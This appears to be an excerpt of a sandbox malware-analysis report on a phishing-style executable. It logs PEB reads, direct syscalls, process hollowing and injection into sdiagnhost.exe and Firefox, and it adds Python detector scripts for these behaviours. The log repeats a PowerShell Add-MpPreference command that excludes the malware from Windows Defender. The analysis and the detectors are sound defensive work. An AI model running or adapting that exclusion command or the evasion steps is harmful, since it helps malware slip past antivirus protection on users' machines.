                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173260B mov eax, dword ptr fs:[00000030h]6_2_0173260B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173260B mov eax, dword ptr fs:[00000030h]6_2_0173260B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173260B mov eax, dword ptr fs:[00000030h]6_2_0173260B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173260B mov eax, dword ptr fs:[00000030h]6_2_0173260B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173260B mov eax, dword ptr fs:[00000030h]6_2_0173260B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179E6F2 mov eax, dword ptr fs:[00000030h]6_2_0179E6F2
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0179E6F2 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A06F1 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0175A6C7 mov ebx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0175A6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017566B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0175C6A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01724690 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017C4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017AC97C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01746962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0176096E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0176096E mov edx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A0946 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A892A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017B892B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017AC912 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01718918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0179E908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017529F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017AE9E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0172A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017549D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017EA9D3 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017B69C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A89B3 mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017A89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017329A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017209AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017AE872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017B6870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01750854 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01724859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01732840 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01742835 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01742835 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0175A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017C483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017AC810 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0175C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017EA8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0174E8C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017AC89D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01720887 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0171CB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017CEB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017D4B4B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017B6B40 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017EAB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017C8B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0174EB20 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017E8B28 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0179EB1D mov eax, dword ptr fs:[00000030h] (9 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01728BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0174EBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017ACBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017CEBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01740BCB mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01720BCD mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01730BBE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017D4BB0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0179CA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0175CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017CEA60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01726A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01730A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01744A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0175CA38 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0175CA24 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0174EA2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017ACA11 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0175AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01720AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01754AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01776ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01728AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01776AA4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01758A90 mov edx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_0172EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017F4A80 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_017B8D6B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01720D59 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Users\user\Desktop\PO 20495088.exe | Code function: 6_2_01728D59 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\PO 20495088.exe | Memory allocated: page read and write | page guard
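The "Code function" rows above are the evidence behind the report's "Contains functionality to read the PEB" signature: on 32-bit Windows the TEB field at fs:[0x30] holds the pointer to the Process Environment Block, and reading it is the first step of PEB-based checks such as testing PEB.BeingDebugged (offset 2) or walking PEB.Ldr (offset 0xC) to resolve APIs without an import table. The script below is an added example, not Joe Sandbox code and not part of the report: it scans a raw x86 code blob for the encodings of `mov <reg32>, dword ptr fs:[30h]` the sandbox lists, and marks reads into eax that are immediately followed by a BeingDebugged test. The function names and the `SAMPLE_CODE` byte string are constructed for the demonstration (hand-assembled, not bytes taken from the sample).

```python
"""Locate x86 reads of the PEB pointer (fs:[30h]) in a raw code blob.

Added example: this is not Joe Sandbox code; it reproduces the idea behind the
"Contains functionality to read the PEB" evidence rows as a byte-pattern scan.
"""
from typing import NamedTuple

# Encodings of `mov <reg32>, dword ptr fs:[00000030h]` on 32-bit x86:
# 0x64 is the FS segment-override prefix, A1 is `mov eax, moffs32`, and
# 8B /r with a disp32-only ModRM byte (mod=00, r/m=101) covers every register.
PEB_READ_PATTERNS = {
    bytes.fromhex("64A130000000"):   "eax",
    bytes.fromhex("648B0530000000"): "eax",
    bytes.fromhex("648B0D30000000"): "ecx",
    bytes.fromhex("648B1530000000"): "edx",
    bytes.fromhex("648B1D30000000"): "ebx",
    bytes.fromhex("648B3530000000"): "esi",
    bytes.fromhex("648B3D30000000"): "edi",
}

# When the PEB pointer lands in eax, these follow-on instructions read
# PEB.BeingDebugged (offset 2): `movzx eax, byte ptr [eax+2]` and
# `cmp byte ptr [eax+2], 0`. They turn a generic PEB read into an anti-debug check.
BEING_DEBUGGED_FOLLOWUPS = (bytes.fromhex("0FB64002"), bytes.fromhex("80780200"))


class PebRead(NamedTuple):
    offset: int                 # byte offset of the fs:[30h] read in the blob
    register: str               # destination register
    being_debugged_check: bool  # followed by a PEB.BeingDebugged test


def find_peb_reads(code: bytes) -> list[PebRead]:
    """Return every fs:[30h] read in `code`, ordered by offset."""
    hits: list[PebRead] = []
    for pattern, reg in PEB_READ_PATTERNS.items():
        start = 0
        while (pos := code.find(pattern, start)) != -1:
            end = pos + len(pattern)
            followup = code[end:end + 4]
            hits.append(PebRead(pos, reg, reg == "eax" and followup in BEING_DEBUGGED_FOLLOWUPS))
            start = pos + 1
    return sorted(hits)


def summarize(hits: list[PebRead]) -> dict[str, int]:
    """Counts a triage analyst would put next to the report's signature."""
    return {
        "peb_reads": len(hits),
        "being_debugged_checks": sum(h.being_debugged_check for h in hits),
    }


# Constructed sample: a hand-assembled x86 fragment, not bytes from the sample.
SAMPLE_CODE = (
    b"\x55\x8b\xec"                       # push ebp; mov ebp, esp
    + bytes.fromhex("64A130000000")       # mov eax, dword ptr fs:[30h]   (offset 3)
    + bytes.fromhex("0FB64002")           # movzx eax, byte ptr [eax+2]   (BeingDebugged)
    + b"\x85\xc0\x75\x05"                 # test eax, eax; jnz +5
    + bytes.fromhex("648B1D30000000")     # mov ebx, dword ptr fs:[30h]   (offset 17)
    + b"\x8b\x43\x0c"                     # mov eax, [ebx+0Ch]            (PEB.Ldr)
    + b"\xc3"                             # ret
)

if __name__ == "__main__":
    found = find_peb_reads(SAMPLE_CODE)
    for h in found:
        flag = " (BeingDebugged check)" if h.being_debugged_check else ""
        print(f"offset {h.offset:#06x}: mov {h.register}, fs:[30h]{flag}")
    print(summarize(found))
```

Run it against a dumped code section (the report's function addresses are in the unpacked second-stage image, so dump that region from the sandbox rather than scanning the packed .NET file on disk). A high count of fs:[30h] reads with no BeingDebugged follow-up is typical of API resolution via PEB.Ldr; the follow-up variants are the anti-debug cases.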

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\PO 20495088.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe"
Source: C:\Users\user\Desktop\PO 20495088.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe"
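The rows above show the sample spawning PowerShell to add its own path to the Windows Defender exclusion list. The detector below is an added example, not part of the report: it takes process-creation telemetry as (command line, parent image) pairs, decodes an `-EncodedCommand` payload the way powershell.exe does (base64 of UTF-16LE text; the documented short forms are `-e` and `-ec`, and any unambiguous prefix such as `-enc` is accepted), flags `Add-MpPreference`/`Set-MpPreference` invocations that set an exclusion, and marks the case where the excluded path is the parent process's own executable or a directory containing it. The first sample event is the command line the report shows; the other events, the parent paths and the encoded payload are constructed.

```python
"""Flag PowerShell command lines that carve a Windows Defender exclusion.

Added example, not part of the Joe Sandbox report. Input is process-creation
telemetry: (command line, parent image path). Encoded commands are decoded
the way powershell.exe does (base64 of UTF-16LE text).
"""
import base64
import re
from typing import Optional

EXCLUSION_CMDLET = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.IGNORECASE)
EXCLUSION_PARAM = re.compile(r"-Exclusion(?:Path|Process|Extension|IpAddress)\b", re.IGNORECASE)
# One -ExclusionPath value: quoted strings or bare tokens, optionally comma-separated.
_VALUE = r'''(?:"[^"]*"|'[^']*'|[^\s,"'])+'''
EXCLUSION_PATH_ARG = re.compile(rf"-ExclusionPath\s+({_VALUE}(?:\s*,\s*{_VALUE})*)", re.IGNORECASE)


def _is_encoded_flag(token: str) -> bool:
    # powershell.exe documents -EncodedCommand, -e and -ec, and accepts any
    # unambiguous prefix (-enc, -encoded, ...); -ExecutionPolicy must not match.
    if token[:1] not in ("-", "/"):
        return False
    name = token.lstrip("-/").lower()
    return name in ("e", "ec") or (bool(name) and "encodedcommand".startswith(name))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script when the command line carries -EncodedCommand."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)
    for flag, value in zip(tokens, tokens[1:]):
        if _is_encoded_flag(flag):
            try:
                return base64.b64decode(value.strip('"'), validate=True).decode("utf-16-le")
            except ValueError:  # bad base64 or not UTF-16LE: treat as undecodable
                return None
    return None


def exclusion_paths(script: str) -> list[str]:
    """Values passed to -ExclusionPath (commas inside paths are not handled)."""
    paths: list[str] = []
    for m in EXCLUSION_PATH_ARG.finditer(script):
        paths += [p.strip().strip("\"'") for p in m.group(1).split(",") if p.strip()]
    return paths


def _covers(excluded: str, image: str) -> bool:
    """True when `excluded` is `image` itself or a directory above it."""
    e, i = excluded.rstrip("\\").lower(), image.lower()
    return i == e or i.startswith(e + "\\")


def inspect(cmdline: str, parent_image: Optional[str] = None) -> dict:
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    paths = exclusion_paths(script)
    return {
        "suspicious": bool(EXCLUSION_CMDLET.search(script) and EXCLUSION_PARAM.search(script)),
        "encoded": decoded is not None,
        "paths": paths,
        # The report's case: the excluded path is the parent's own executable.
        "self_exclusion": parent_image is not None and any(_covers(p, parent_image) for p in paths),
    }


def scan(events: list[tuple[str, str]]) -> list[dict]:
    return [inspect(cmd, parent) for cmd, parent in events]


# Constructed sample events. The first command line is the one the report shows;
# the others (paths, base64 payload) are made up for the demonstration.
PLAIN_SCRIPT = r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svc"'
ENCODED = base64.b64encode(PLAIN_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference '
     r'-ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe"',
     r"C:\Users\user\Desktop\PO 20495088.exe"),
    (f"powershell.exe -nop -w hidden -enc {ENCODED}", r"C:\Users\user\AppData\Roaming\svc\agent.exe"),
    ("powershell.exe Get-MpPreference", r"C:\Windows\explorer.exe"),
    (r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for (cmd, parent), finding in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(f"{'ALERT' if finding['suspicious'] else 'ok   '} parent={parent!r} {finding}")
```

The self-exclusion flag is the high-confidence part: an administrator excluding a build directory is routine, a freshly dropped executable excluding itself is not. On a host where this fired, `Get-MpPreference` shows the surviving exclusion and `Remove-MpPreference -ExclusionPath` clears it.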
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtOpenSection: Direct from: 0x76EF2E0C
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtCreateFile: Direct from: 0x76EF2FEC
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtOpenFile: Direct from: 0x76EF2DCC
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtTerminateThread: Direct from: 0x76EF2FCC
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtUnmapViewOfSection: Direct from: 0x76EF2D3C
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtCreateMutant: Direct from: 0x76EF35CC
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtResumeThread: Direct from: 0x76EF36AC
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtReadFile: Direct from: 0x76EF2ADC
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtDelayExecution: Direct from: 0x76EF2DDC
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtResumeThread: Direct from: 0x76EF2FBC
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtCreateUserProcess: Direct from: 0x76EF371C
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtSetInformationThread: Direct from: 0x76EE63F9
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe | NtCreateKey: Direct from: 0x76EF2C6C
Source: C:\Users\user\Desktop\PO 20495088.exe | Memory written: C:\Users\user\Desktop\PO 20495088.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\PO 20495088.exe | Section loaded: NULL target: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PO 20495088.exe | Section loaded: NULL target: C:\Windows\SysWOW64\sdiagnhost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\sdiagnhost.exe | Section loaded: NULL target: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe protection: read write
Source: C:\Windows\SysWOW64\sdiagnhost.exe | Section loaded: NULL target: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\sdiagnhost.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\sdiagnhost.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\sdiagnhost.exe | Thread register set: target process: 6308
Source: C:\Windows\SysWOW64\sdiagnhost.exe | Thread APC queued: target process: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe
Source: C:\Users\user\Desktop\PO 20495088.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 20495088.exe"
Source: C:\Users\user\Desktop\PO 20495088.exe | Process created: C:\Users\user\Desktop\PO 20495088.exe "C:\Users\user\Desktop\PO 20495088.exe"
